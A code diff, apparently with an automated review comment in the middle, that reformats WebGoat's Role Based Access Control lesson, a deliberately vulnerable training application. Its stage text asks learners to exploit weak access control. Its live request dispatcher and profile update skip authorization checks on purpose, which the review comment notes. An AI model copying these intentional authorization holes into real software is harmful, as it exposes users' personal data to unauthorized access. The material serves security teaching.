registerActions(String className) + { + registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); + registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); + registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); + registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); + registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); - // Stage 1 - hints - .add("How does the application know that the user selected the delete function?"); - - // Stage 2 - - // Stage 3 - hints - .add("How does the application know that the user selected any particular employee to view?"); - - // Stage 4 - hints - .add("Note that the contents of the staff listing change depending on who 
is logged in."); - - return hints; - } - - @Override - public String[] getStages() { - if (getWebgoatContext().isCodingExercises()) - return new String[] {STAGE1, STAGE2, STAGE3, STAGE4}; - return new String[] {STAGE1, STAGE3}; + // These actions are special in that they chain to other actions. + registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION))); + registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION))); + registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); } - /** - * Gets the instructions attribute of the ParameterInjection object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = ""; - - if (!getLessonTracker(s).getCompleted()) + /** + * Gets the category attribute of the CommandInjection object + * + * @return The category value + */ + public Category getDefaultCategory() { - String stage = getStage(s); - if (STAGE1.equals(stage)) - { - instructions = "Stage 1: Bypass Presentational Layer Access Control.
" - + "As regular employee 'Tom', exploit weak access control to use the Delete function from the Staff List page. " - + "Verify that Tom's profile can be deleted."; - } - else if (STAGE2.equals(stage)) + return Category.ACCESS_CONTROL; + } + + /** + * Gets the hints attribute of the DirectoryScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("Many sites attempt to restrict access to resources by role."); + hints.add("Developers frequently make mistakes implementing this scheme."); + hints.add("Attempt combinations of users, roles, and resources."); + + // Stage 1 + hints.add("How does the application know that the user selected the delete function?"); + + // Stage 2 + + // Stage 3 + hints.add("How does the application know that the user selected any particular employee to view?"); + + // Stage 4 + hints.add("Note that the contents of the staff listing change depending on who is logged in."); + + return hints; + } + + @Override + public String[] getStages() + { + if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2, STAGE3, STAGE4 }; + return new String[] { STAGE1, STAGE3 }; + } + + /** + * Gets the instructions attribute of the ParameterInjection object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + String instructions = ""; + + if (!getLessonTracker(s).getCompleted()) { - instructions = "Stage 2: Add Business Layer Access Control.
" - + "Implement a fix to deny unauthorized access to the Delete function. " - + "Repeat stage 1. Verify that access to Delete is properly denied."; - } - else if (STAGE3.equals(stage)) - { - instructions = "Stage 3: Breaking Data Layer Access Control.
" - + "As regular employee 'Tom', exploit weak access control to View another employee's profile. Verify the access."; - } - else if (STAGE4.equals(stage)) - { - instructions = "Stage 4: Add Data Layer Access Control.
" - + "Implement a fix to deny unauthorized access to this data. " - + "Repeat stage 3. Verify that access to other employee's profiles is properly denied."; - } - } - - return instructions; - } - - public void handleRequest(WebSession s) - { - // Here is where dispatching to the various action handlers happens. - // It would be a good place verify authorization to use an action. - - //System.out.println("RoleBasedAccessControl.handleRequest()"); - if (s.getLessonSession(this) == null) - s.openLessonSession(this); - - String requestedActionName = null; - try - { - requestedActionName = s.getParser().getStringParameter("action"); - } - catch (ParameterNotFoundException pnfe) - { - // Let them eat login page. - requestedActionName = LOGIN_ACTION; - } - //System.out.println("Requested lesson action: " + requestedActionName); - - try - { - LessonAction action = getAction(requestedActionName); - if (action != null) - { - //System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " + action.getActionName()); - if (!action.requiresAuthentication()) - { - // Access to Login does not require authentication. - action.handleRequest(s); - } - else - { - if (action.isAuthenticated(s)) - { - action.handleRequest(s); - } - else - throw new UnauthenticatedException(); - } - } - else - setCurrentAction(s, ERROR_ACTION); - } - catch (ParameterNotFoundException pnfe) - { - System.out.println("Missing parameter"); - pnfe.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (ValidationException ve) - { - System.out.println("Validation failed"); - ve.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (UnauthenticatedException ue) - { - s.setMessage("Login failed"); - System.out.println("Authentication failure"); - ue.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - s.setMessage("You are not authorized to perform this function"); - - // Update lesson status if necessary. 
- String stage = getStage(s); - if (STAGE2.equals(stage)) - { - try + String stage = getStage(s); + if (STAGE1.equals(stage)) { - if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName) && - !isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION)) - { - setStageComplete(s, STAGE2); + instructions = "Stage 1: Bypass Presentational Layer Access Control.
" + + "As regular employee 'Tom', exploit weak access control to use the Delete function from the Staff List page. " + + "Verify that Tom's profile can be deleted."; } - } catch (ParameterNotFoundException pnfe) + else if (STAGE2.equals(stage)) { - pnfe.printStackTrace(); + instructions = "Stage 2: Add Business Layer Access Control.
" + + "Implement a fix to deny unauthorized access to the Delete function. " + + "Repeat stage 1. Verify that access to Delete is properly denied."; + } + else if (STAGE3.equals(stage)) + { + instructions = "Stage 3: Breaking Data Layer Access Control.
" + + "As regular employee 'Tom', exploit weak access control to View another employee's profile. Verify the access."; + } + else if (STAGE4.equals(stage)) + { + instructions = "Stage 4: Add Data Layer Access Control.
" + + "Implement a fix to deny unauthorized access to this data. " + + "Repeat stage 3. Verify that access to other employee's profiles is properly denied."; } } - //System.out.println("isAuthorized() exit stage: " + getStage(s)); - // Update lesson status if necessary. - if (STAGE4.equals(stage)) - { - try - { - //System.out.println("Checking for stage 4 completion"); - DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s)); - int userId = Integer.parseInt((String)s.getRequest().getSession().getAttribute(getLessonName() + "." - + RoleBasedAccessControl.USER_ID)); - int employeeId = s.getParser().getIntParameter( - RoleBasedAccessControl.EMPLOYEE_ID); - if (!action.isAuthorizedForEmployee(s, userId, employeeId)) - { - setStageComplete(s, STAGE4); - } - } catch (Exception e) - { - // swallow this - shouldn't happen inthe normal course - // e.printStackTrace(); - } + return instructions; + } + + public void handleRequest(WebSession s) + { + // Here is where dispatching to the various action handlers happens. + // It would be a good place verify authorization to use an action. + + // System.out.println("RoleBasedAccessControl.handleRequest()"); + if (s.getLessonSession(this) == null) s.openLessonSession(this); + + String requestedActionName = null; + try + { + requestedActionName = s.getParser().getStringParameter("action"); + } catch (ParameterNotFoundException pnfe) + { + // Let them eat login page. + requestedActionName = LOGIN_ACTION; } - - System.out.println("Authorization failure"); - setCurrentAction(s, ERROR_ACTION); - ue2.printStackTrace(); - } - catch (Exception e) - { - // All other errors send the user to the generic error page - System.out.println("handleRequest() error"); - e.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } + // System.out.println("Requested lesson action: " + requestedActionName); - // All this does for this lesson is ensure that a non-null content exists. 
- setContent(new ElementContainer()); - } - - - public void handleRequest_BACKUP(WebSession s) - { - // Here is where dispatching to the various action handlers happens. - // It would be a good place verify authorization to use an action. - - //System.out.println("RoleBasedAccessControl.handleRequest()"); - if (s.getLessonSession(this) == null) - s.openLessonSession(this); - - String requestedActionName = null; - try - { - requestedActionName = s.getParser().getStringParameter("action"); - } - catch (ParameterNotFoundException pnfe) - { - // Let them eat login page. - requestedActionName = LOGIN_ACTION; - } - //System.out.println("Requested lesson action: " + requestedActionName); - - if (requestedActionName != null) - { - try - { - LessonAction action = getAction(requestedActionName); - if (action != null) + try { - //System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " + action.getActionName()); - if (!action.requiresAuthentication()) - { - // Access to Login does not require authentication. - action.handleRequest(s); - } - else - { - if (action.isAuthenticated(s)) + LessonAction action = getAction(requestedActionName); + if (action != null) { - int userId = action.getUserId(s); - if (action.isAuthorized(s, userId, action - .getActionName())) - { - action.handleRequest(s); - } - else - { - throw new UnauthorizedException(); - } + // System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " + + // action.getActionName()); + if (!action.requiresAuthentication()) + { + // Access to Login does not require authentication. 
+ action.handleRequest(s); + } + else + { + if (action.isAuthenticated(s)) + { + action.handleRequest(s); + } + else + throw new UnauthenticatedException(); + } } else - throw new UnauthenticatedException(); - } - } - else - setCurrentAction(s, ERROR_ACTION); - } - catch (ParameterNotFoundException pnfe) - { - System.out.println("Missing parameter"); - pnfe.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (ValidationException ve) - { - System.out.println("Validation failed"); - ve.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (UnauthenticatedException ue) - { - s.setMessage("Login failed"); - System.out.println("Authentication failure"); - ue.printStackTrace(); - } - catch (UnauthorizedException ue2) + setCurrentAction(s, ERROR_ACTION); + } catch (ParameterNotFoundException pnfe) { - String stage = getStage(s); + System.out.println("Missing parameter"); + pnfe.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (ValidationException ve) + { + System.out.println("Validation failed"); + ve.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (UnauthenticatedException ue) + { + s.setMessage("Login failed"); + System.out.println("Authentication failure"); + ue.printStackTrace(); + } catch (UnauthorizedException ue2) + { + s.setMessage("You are not authorized to perform this function"); + // Update lesson status if necessary. 
+ String stage = getStage(s); if (STAGE2.equals(stage)) { try { - if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName) && - !isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION)) - { - setStageComplete(s, STAGE2); - } + if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName) + && !isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION)) + { + setStageComplete(s, STAGE2); + } } catch (ParameterNotFoundException pnfe) { - pnfe.printStackTrace(); + pnfe.printStackTrace(); } } - //System.out.println("isAuthorized() exit stage: " + getStage(s)); + // System.out.println("isAuthorized() exit stage: " + getStage(s)); // Update lesson status if necessary. if (STAGE4.equals(stage)) { try { - //System.out.println("Checking for stage 4 completion"); - DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s)); - int userId = Integer.parseInt((String)s.getRequest().getSession().getAttribute(getLessonName() + "." - + RoleBasedAccessControl.USER_ID)); - int employeeId = s.getParser().getIntParameter( - RoleBasedAccessControl.EMPLOYEE_ID); + // System.out.println("Checking for stage 4 completion"); + DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s)); + int userId = Integer.parseInt((String) s.getRequest().getSession() + .getAttribute(getLessonName() + "." 
+ RoleBasedAccessControl.USER_ID)); + int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID); - if (!action.isAuthorizedForEmployee(s, userId, employeeId)) - { - setStageComplete(s, STAGE4); - } + if (!action.isAuthorizedForEmployee(s, userId, employeeId)) + { + setStageComplete(s, STAGE4); + } } catch (Exception e) { // swallow this - shouldn't happen inthe normal course // e.printStackTrace(); } } - - s.setMessage("You are not authorized to perform this function"); - System.out.println("Authorization failure"); - setCurrentAction(s, ERROR_ACTION); - ue2.printStackTrace(); + + System.out.println("Authorization failure"); + setCurrentAction(s, ERROR_ACTION); + ue2.printStackTrace(); + } catch (Exception e) + { + // All other errors send the user to the generic error page + System.out.println("handleRequest() error"); + e.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); } - catch (Exception e) - { - // All other errors send the user to the generic error page - System.out.println("handleRequest() error"); - e.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } + + // All this does for this lesson is ensure that a non-null content exists. + setContent(new ElementContainer()); } - // All this does for this lesson is ensure that a non-null content exists. - setContent(new ElementContainer()); - } + public void handleRequest_BACKUP(WebSession s) + { + // Here is where dispatching to the various action handlers happens. + // It would be a good place verify authorization to use an action. - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } + // System.out.println("RoleBasedAccessControl.handleRequest()"); + if (s.getLessonSession(this) == null) s.openLessonSession(this); + String requestedActionName = null; + try + { + requestedActionName = s.getParser().getStringParameter("action"); + } catch (ParameterNotFoundException pnfe) + { + // Let them eat login page. 
+ requestedActionName = LOGIN_ACTION; + } + // System.out.println("Requested lesson action: " + requestedActionName); - /** - * Gets the title attribute of the DirectoryScreen object - * - * @return The title value - */ - public String getTitle() - { - return "LAB: Role Based Access Control"; - } + if (requestedActionName != null) + { + try + { + LessonAction action = getAction(requestedActionName); + if (action != null) + { + // System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " + // + + // action.getActionName()); + if (!action.requiresAuthentication()) + { + // Access to Login does not require authentication. + action.handleRequest(s); + } + else + { + if (action.isAuthenticated(s)) + { + int userId = action.getUserId(s); + if (action.isAuthorized(s, userId, action.getActionName())) + { + action.handleRequest(s); + } + else + { + throw new UnauthorizedException(); + } + } + else + throw new UnauthenticatedException(); + } + } + else + setCurrentAction(s, ERROR_ACTION); + } catch (ParameterNotFoundException pnfe) + { + System.out.println("Missing parameter"); + pnfe.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (ValidationException ve) + { + System.out.println("Validation failed"); + ve.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (UnauthenticatedException ue) + { + s.setMessage("Login failed"); + System.out.println("Authentication failure"); + ue.printStackTrace(); + } catch (UnauthorizedException ue2) + { + String stage = getStage(s); + // Update lesson status if necessary. 
+ if (STAGE2.equals(stage)) + { + try + { + if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName) + && !isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION)) + { + setStageComplete(s, STAGE2); + } + } catch (ParameterNotFoundException pnfe) + { + pnfe.printStackTrace(); + } + } + // System.out.println("isAuthorized() exit stage: " + getStage(s)); + // Update lesson status if necessary. + if (STAGE4.equals(stage)) + { + try + { + // System.out.println("Checking for stage 4 completion"); + DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s)); + int userId = Integer.parseInt((String) s.getRequest().getSession() + .getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID)); + int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID); + + if (!action.isAuthorizedForEmployee(s, userId, employeeId)) + { + setStageComplete(s, STAGE4); + } + } catch (Exception e) + { + // swallow this - shouldn't happen inthe normal course + // e.printStackTrace(); + } + } + + s.setMessage("You are not authorized to perform this function"); + System.out.println("Authorization failure"); + setCurrentAction(s, ERROR_ACTION); + ue2.printStackTrace(); + } catch (Exception e) + { + // All other errors send the user to the generic error page + System.out.println("handleRequest() error"); + e.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } + } + + // All this does for this lesson is ensure that a non-null content exists. + setContent(new ElementContainer()); + } + + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } + + /** + * Gets the title attribute of the DirectoryScreen object + * + * @return The title value + */ + public String getTitle() + { + return "LAB: Role Based Access Control"; + } } 
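Review bot: After this reformat, `handleRequest` and `handleRequest_BACKUP` remain two near-identical dispatch bodies whose only functional difference is the `action.isAuthorized(s, userId, action.getActionName())` gate that the BACKUP variant applies before `action.handleRequest(s)`, and nothing in the class says which copy is the intentionally incomplete lesson code. Since Stage 2 asks the learner to add exactly that business-layer check, a header comment on `handleRequest` such as `// Lesson code: dispatches without an isAuthorized() check on purpose (Stage 2 asks the learner to add it); handleRequest_BACKUP holds the reference version` would keep a later cleanup or formatter pass from "fixing" the wrong copy or deleting the reference. In both copies the Stage 4 completion check catches `Exception` and swallows it while the comment says it "shouldn't happen", yet the `Integer.parseInt` of the session attribute and `getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID)` can plausibly fail, which would silently prevent the stage from being marked complete; uncommenting `e.printStackTrace();` there, or at least logging like the other catch blocks do, would make that failure visible. The formatter also produced braceless single-line forms, `if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2, STAGE3, STAGE4 };` and `if (s.getLessonSession(this) == null) s.openLessonSession(this);`, while every other body in the file is braced.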
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java
index f5bddc3a0..56b805267 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.lessons.RoleBasedAccessControl;
 
-import java.sql.PreparedStatement;
+import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
@@ -15,286 +15,251 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class UpdateProfile extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - - public UpdateProfile(GoatHillsFinancial lesson, String lessonName, - String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException, - ValidationException - { - if (isAuthenticated(s)) + public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) { - int userId = getIntSessionAttribute(s, getLessonName() + "." 
- + RoleBasedAccessControl.USER_ID); - - int subjectId = s.getParser().getIntParameter( - RoleBasedAccessControl.EMPLOYEE_ID, 0); - - String firstName = s.getParser().getStringParameter( - RoleBasedAccessControl.FIRST_NAME); - String lastName = s.getParser().getStringParameter( - RoleBasedAccessControl.LAST_NAME); - String ssn = s.getParser().getStringParameter( - RoleBasedAccessControl.SSN); - String title = s.getParser().getStringParameter( - RoleBasedAccessControl.TITLE); - String phone = s.getParser().getStringParameter( - RoleBasedAccessControl.PHONE_NUMBER); - String address1 = s.getParser().getStringParameter( - RoleBasedAccessControl.ADDRESS1); - String address2 = s.getParser().getStringParameter( - RoleBasedAccessControl.ADDRESS2); - int manager = s.getParser().getIntParameter( - RoleBasedAccessControl.MANAGER); - String startDate = s.getParser().getStringParameter( - RoleBasedAccessControl.START_DATE); - int salary = s.getParser().getIntParameter( - RoleBasedAccessControl.SALARY); - String ccn = s.getParser().getStringParameter( - RoleBasedAccessControl.CCN); - int ccnLimit = s.getParser().getIntParameter( - RoleBasedAccessControl.CCN_LIMIT); - String disciplinaryActionDate = s.getParser().getStringParameter( - RoleBasedAccessControl.DISCIPLINARY_DATE); - String disciplinaryActionNotes = s.getParser().getStringParameter( - RoleBasedAccessControl.DISCIPLINARY_NOTES); - String personalDescription = s.getParser().getStringParameter( - RoleBasedAccessControl.DESCRIPTION); - - Employee employee = new Employee(subjectId, firstName, lastName, - ssn, title, phone, address1, address2, manager, startDate, - salary, ccn, ccnLimit, disciplinaryActionDate, - disciplinaryActionNotes, personalDescription); - - if (subjectId > 0) - { - this.changeEmployeeProfile(s, userId, subjectId, employee); - setRequestAttribute(s, getLessonName() + "." 
- + RoleBasedAccessControl.EMPLOYEE_ID, Integer - .toString(subjectId)); - } - else - this.createEmployeeProfile(s, userId, employee); - - try - { - chainedAction.handleRequest(s); - } - catch (UnauthenticatedException ue1) - { - System.out.println("Internal server error"); - ue1.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - System.out.println("Internal server error"); - ue2.printStackTrace(); - } + super(lesson, lessonName, actionName); + this.chainedAction = chainedAction; } - else - throw new UnauthenticatedException(); - } - - public String getNextPage(WebSession s) - { - return RoleBasedAccessControl.VIEWPROFILE_ACTION; - } - - - public void changeEmployeeProfile(WebSession s, int userId, int subjectId, - Employee employee) throws UnauthorizedException - { - try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException, ValidationException { - // Note: The password field is ONLY set by ChangePassword - String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?," - + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?," - + " personal_description = ? 
WHERE userid = ?;"; - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - - ps.setString(1, employee.getFirstName()); - ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, employee.getPersonalDescription()); - ps.setInt(13, subjectId); - ps.execute(); - } - catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } + if (isAuthenticated(s)) + { + int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID); + int subjectId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID, 0); + + String firstName = s.getParser().getStringParameter(RoleBasedAccessControl.FIRST_NAME); + String lastName = s.getParser().getStringParameter(RoleBasedAccessControl.LAST_NAME); + String ssn = s.getParser().getStringParameter(RoleBasedAccessControl.SSN); + String title = s.getParser().getStringParameter(RoleBasedAccessControl.TITLE); + String phone = s.getParser().getStringParameter(RoleBasedAccessControl.PHONE_NUMBER); + String address1 = s.getParser().getStringParameter(RoleBasedAccessControl.ADDRESS1); + String address2 = s.getParser().getStringParameter(RoleBasedAccessControl.ADDRESS2); + int manager = s.getParser().getIntParameter(RoleBasedAccessControl.MANAGER); + String startDate = s.getParser().getStringParameter(RoleBasedAccessControl.START_DATE); + int salary = s.getParser().getIntParameter(RoleBasedAccessControl.SALARY); + String ccn = s.getParser().getStringParameter(RoleBasedAccessControl.CCN); + int 
ccnLimit = s.getParser().getIntParameter(RoleBasedAccessControl.CCN_LIMIT); + String disciplinaryActionDate = s.getParser().getStringParameter(RoleBasedAccessControl.DISCIPLINARY_DATE); + String disciplinaryActionNotes = s.getParser() + .getStringParameter(RoleBasedAccessControl.DISCIPLINARY_NOTES); + String personalDescription = s.getParser().getStringParameter(RoleBasedAccessControl.DESCRIPTION); + + Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2, + manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes, + personalDescription); + + if (subjectId > 0) + { + this.changeEmployeeProfile(s, userId, subjectId, employee); + setRequestAttribute(s, getLessonName() + "." + RoleBasedAccessControl.EMPLOYEE_ID, Integer + .toString(subjectId)); + } + else + this.createEmployeeProfile(s, userId, employee); + + try + { + chainedAction.handleRequest(s); + } catch (UnauthenticatedException ue1) + { + System.out.println("Internal server error"); + ue1.printStackTrace(); + } catch (UnauthorizedException ue2) + { + System.out.println("Internal server error"); + ue2.printStackTrace(); + } + } + else + throw new UnauthenticatedException(); } - catch (Exception e) + + public String getNextPage(WebSession s) { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); + return RoleBasedAccessControl.VIEWPROFILE_ACTION; } - } - - public void changeEmployeeProfile_BACKUP(WebSession s, int userId, - int subjectId, Employee employee) throws UnauthorizedException - { - try + public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee) + throws UnauthorizedException { - // Note: The password field is ONLY set by ChangePassword - String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?," - + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?," - + " personal_description = ? 
WHERE userid = ?;"; - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - - ps.setString(1, employee.getFirstName()); - ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, employee.getPersonalDescription()); - ps.setInt(13, subjectId); - ps.executeUpdate(query); - } - catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } + try + { + // Note: The password field is ONLY set by ChangePassword + String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?," + + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?," + + " personal_description = ? 
WHERE userid = ?;"; + try + { + PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, + ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ps.setString(1, employee.getFirstName()); + ps.setString(2, employee.getLastName()); + ps.setString(3, employee.getSsn()); + ps.setString(4, employee.getTitle()); + ps.setString(5, employee.getPhoneNumber()); + ps.setString(6, employee.getAddress1()); + ps.setString(7, employee.getAddress2()); + ps.setInt(8, employee.getManager()); + ps.setString(9, employee.getStartDate()); + ps.setString(10, employee.getCcn()); + ps.setInt(11, employee.getCcnLimit()); + ps.setString(12, employee.getPersonalDescription()); + ps.setInt(13, subjectId); + ps.execute(); + } catch (SQLException sqle) + { + s.setMessage("Error updating employee profile"); + sqle.printStackTrace(); + } + + } catch (Exception e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); + } } - catch (Exception e) + + public void changeEmployeeProfile_BACKUP(WebSession s, int userId, int subjectId, Employee employee) + throws UnauthorizedException { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); - } - } + try + { + // Note: The password field is ONLY set by ChangePassword + String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?," + + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?," + + " personal_description = ? 
WHERE userid = ?;"; + try + { + PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, + ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); - protected int getNextUID(WebSession s) - { - int uid = -1; - try + ps.setString(1, employee.getFirstName()); + ps.setString(2, employee.getLastName()); + ps.setString(3, employee.getSsn()); + ps.setString(4, employee.getTitle()); + ps.setString(5, employee.getPhoneNumber()); + ps.setString(6, employee.getAddress1()); + ps.setString(7, employee.getAddress2()); + ps.setInt(8, employee.getManager()); + ps.setString(9, employee.getStartDate()); + ps.setString(10, employee.getCcn()); + ps.setInt(11, employee.getCcnLimit()); + ps.setString(12, employee.getPersonalDescription()); + ps.setInt(13, subjectId); + ps.executeUpdate(query); + } catch (SQLException sqle) + { + s.setMessage("Error updating employee profile"); + sqle.printStackTrace(); + } + + } catch (Exception e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); + } + } + + protected int getNextUID(WebSession s) { - Statement statement = WebSession.getConnection(s).createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement - .executeQuery("select max(userid) as uid from employee"); - results.first(); - uid = results.getInt("uid"); + int uid = -1; + try + { + Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ResultSet results = statement.executeQuery("select max(userid) as uid from employee"); + results.first(); + uid = results.getInt("uid"); + } catch (SQLException sqle) + { + sqle.printStackTrace(); + s.setMessage("Error updating employee profile"); + } catch (ClassNotFoundException e) + { + // TODO Auto-generated catch block + e.printStackTrace(); + } + return uid + 1; } - catch 